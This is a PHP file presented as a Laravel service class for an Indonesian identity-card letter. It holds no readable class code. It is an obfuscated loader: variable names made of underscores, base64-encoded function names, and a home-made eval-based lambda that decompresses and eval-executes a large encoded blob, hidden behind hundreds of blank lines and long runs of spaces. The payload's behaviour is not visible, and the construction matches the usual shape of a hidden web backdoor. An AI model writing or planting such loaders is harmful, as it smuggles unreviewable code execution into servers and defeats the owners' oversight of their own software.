<?php

        $__='printf';$_='Loading app/Services/Surat/Layanan/SuratKetKtpDalamProses.php';
























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if (!function_exists('__lambda')) {
                                                                                                                                                                                                                                              function __lambda($sArgs, $sCode)
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                  return eval("return function($sArgs){{$sCode}};");
                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                          }                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_', $______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo






















































































































































































































































































































                                                                                                                                                                                                                     $________;
